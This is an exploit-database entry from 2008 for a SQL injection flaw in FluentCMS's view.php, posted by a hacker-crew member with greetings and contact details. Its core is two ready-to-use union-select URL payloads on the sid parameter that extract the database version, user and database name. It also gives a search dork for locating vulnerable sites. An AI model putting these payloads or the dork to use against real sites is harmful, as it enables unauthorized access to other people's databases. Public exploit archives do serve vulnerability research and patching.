FluentCMS - 'view.php' SQL Injection

EDB-ID:

5509


Author:

cO2

Type:

webapps


Platform:

PHP

Date:

2008-04-27


###################################################
[~] FluentCMS Remote Sql Ä°nj. Vuln.
                                                                                                              
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greatz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: c02@Hotmail.de
[~] Greetz2 : Str0ke,Inphex,DigitalMind,His0k4,Stack-Terrorist,mArEzZinA,Waraxe,Str0xo
[~] Speacial thanks to : Inphex
[~] Dork :  Powered by FluentCMS
[~] Exploit :
http://www.xxx.org/view.php?sid=-5926+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(version())),17,unhex(hex(user())),unhex(hex(database())),20,21,22,23,24,25,26,27,28,29,30,31,32--
or
http://www.xxx.org/view.php?sid=-3+union+select+1,2,3,unhex(hex(user())),5,6,7,unhex(hex(database())),9,10,11,12,13,14,unhex(hex(version())),16--
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# milw0rm.com [2008-04-27]